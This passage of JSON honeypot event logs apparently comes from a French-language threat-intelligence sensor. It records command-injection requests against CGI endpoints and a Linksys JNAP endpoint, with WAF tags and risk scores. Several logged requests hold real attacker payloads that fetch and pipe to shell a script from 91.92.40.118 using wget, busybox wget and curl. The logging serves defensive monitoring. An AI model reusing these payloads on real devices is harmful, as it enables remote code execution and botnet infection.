\u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lset\u2026\u0022, \u0022request_line\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20w\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.9\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 6 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_setup\u0022, \u0022http_sensitive_path\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_setup\u0022, \u0022http_sensitive_path\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":280},{"id":11809673,"ip":"45.153.34.252","ts":"2026-07-14 02:29:34.000000","proto":"tcp","src_port":47870,"dst_port":8081,"service":"http","classification":"lfi_path_traversal","waf_score":41,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00225e0ad868dd3c13dd4457bba7c1746b5834f6cce3\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 285, \u0022payload_entropy\u0022: 5.103821349451459, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 9, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u00227f032fbc914305d94b22a4b2d45c9ae94444a4c4\u0022, \u0022event_fingerprint\u0022: \u00221c10f2159a01684d4df89a1f8b5da259ebfdf310\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022cb4dd6c58421edff9380d424d7657c65\u0022, \u0022path_pattern_hash\u0022: \u00226aff1c054e67a6e0a068c48726213b60\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo\u0022, \u0022query_string\u0022: \u0022action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo\u0022, \u0022query_string\u0022: \u0022action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo HTTP\/1.1\\r\\nHost: 62.3.50.3\u0022, \u0022payload_snippet\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00223b1fe100e266a4fe125ce0d3eaf1950a75be9f32\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20\u2026\u0022, \u0022request_line\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.1\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%2\u2026\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 6 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 8081, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20\u2026\u0022, \u0022request_line\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.1\u2026\u0022, \u0022port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:8081 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%2\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.\u0022, \u0022target_port_label\u0022: \u00228081 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 6 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u00228081\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:8081","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":285},{"id":11809671,"ip":"45.153.34.252","ts":"2026-07-14 02:29:33.000000","proto":"tcp","src_port":47854,"dst_port":8081,"service":"http","classification":"cmd_injection","waf_score":72,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/JNAP\/","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 5, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u00221994c0ff95f3f16c5fa9177d852edc4f1a4a8a24\u0022, \u0022http_target_hash\u0022: \u00221590bac5c7d7e8540ab87881f47e89fa381ce665\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 463, \u0022payload_entropy\u0022: 5.3493461412064915, \u0022port_category\u0022: \u0022registered\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 8081, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.4, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 82, \u0022tag_count\u0022: 16, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u0022c9ad90777b07e1dcbdd21c15b9df99fd80552daf\u0022, \u0022event_fingerprint\u0022: \u0022fa4fb497c394ece581353e50ea95b8971050cbe3\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 142, \u0022precision_signals\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_cmdi\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932205\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0146\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 82}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022ee6d5d6eb52a4eec71607d1f2557595d\u0022, \u0022path_pattern_hash\u0022: \u002209d793525e81db3cecc4e36c738b6310\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 8081, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 82}, \u0022payload_preview\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jn\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950326:rce-0\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-2\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:8081\\r\\nContent-Type: application\/json; charset=utf-8\\r\\nX-JNAP-Action: http:\/\/linksys.com\/jnap\/network\/Diagnostics\\r\\nContent-Length: 269\\r\\nConnection: close\\r\\n\\r\\n{\\\u0022JNAP\\\u0022:{\\\u0022action\\\u0022:\\\u0022http:\/\/linksys.com\/jnap\/network\/Diagnostics\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ 